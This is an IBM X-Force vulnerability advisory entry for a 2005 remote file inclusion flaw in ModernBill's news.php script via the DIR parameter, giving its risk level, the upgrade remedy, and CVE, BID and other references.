ModernBill news.php script file include

modernbill-news-file-include (20036) The risk level is classified as MediumMedium Risk

Description:

ModernBill could allow a remote attacker to include malicious PHP files. If the register_globals option is enabled, a remote attacker could send a specially-crafted URL to the news.php script using the DIR parameter to specify a malicious file from the local system which would allow the attacker to view or execute arbitrary code on the vulnerable system.


Consequences:

Gain Access

Remedy:

Upgrade to the latest version of ModernBill (4.3.1 or later), when it becomes available from the ModernBill Web site. See References.

References:

  • GulfTech Research and Development, April 10th, 2005: Multiple ModernBill 4.3.0 And Earlier Vulnerabilities.
  • ModernBill Web site: Web Host Billing Software.
  • BID-13086: ModernGigabyte ModernBill News.PHP File Include Vulnerability
  • CVE-2005-1054: PHP remote file inclusion vulnerability in news.php in ModernBill 4.3.0 and earlier allows remote attackers to execute arbitrary PHP code by modifying the DIR parameter to reference a URL on a remote web server that contains the code.
  • OSVDB ID: 15427: ModernBill news.php Remote File Inclusion
  • SA14890: ModernBill Cross-Site Scripting and File Inclusion Vulnerabilities
  • SECTRACK ID: 1013672: ModernBill Include File Error in Sample `news.php` Script Lets Remote Users Execute Commands and Input Validation Holes in `orderwiz.php` Permit Cross-Site Scripting Attacks

Platforms Affected:

  • ModernBill ModernBill 4.3.0 and prior

Reported:

Apr 11, 2005

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net

Return to the main page